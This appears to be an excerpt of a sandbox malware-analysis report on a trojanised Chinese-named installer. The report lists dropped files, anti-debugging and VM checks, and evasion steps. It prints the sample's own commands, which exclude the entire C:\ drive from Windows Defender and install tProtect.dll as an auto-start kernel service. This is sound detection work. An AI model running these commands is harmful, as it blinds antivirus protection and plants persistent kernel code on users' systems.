Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\trash (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-ONGLN.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exe Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-0UFV8.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-0UFV8.tmp\update.vac Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\updat4.vac Jump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exe API coverage: 7.4 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2696 Thread sleep count: 5147 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2696 Thread sleep count: 4572 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3652 Thread sleep time: -7378697629483816s >= -30000s Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CA598B0 FindFirstFileA,FindClose, 6_2_6CA598B0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00386868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW, 10_2_00386868
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00387496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW, 10_2_00387496
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00389C60 GetSystemInfo, 10_2_00389C60
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000002.1774496538.000000000164C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}c
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000002.1774496538.000000000164C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\~
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

barindex
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6C8E3886 NtSetInformationThread 00000000,00000011,00000000,00000000 6_2_6C8E3886
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CA6EFA1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_6CA6EFA1
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_004057D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount, 10_2_004057D0
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CA6DF9D mov eax, dword ptr fs:[00000030h] 6_2_6CA6DF9D
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CA78B86 mov eax, dword ptr fs:[00000030h] 6_2_6CA78B86
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CA78B55 mov eax, dword ptr fs:[00000030h] 6_2_6CA78B55
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CA6EFA1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_6CA6EFA1
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CA67ADD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_6CA67ADD

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" Jump to behavior
Source: tProtect.dll.12.dr Static PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process created: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe "C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" /VERYSILENT Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CB35720 cpuid 6_2_6CB35720
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_0038AB2A GetSystemTimeAsFileTime, 10_2_0038AB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00420090 GetVersion, 10_2_00420090
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1920433392.0000000000B5F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Program Files\Windows Defender\MsMpEng.exe
No contacted IP infos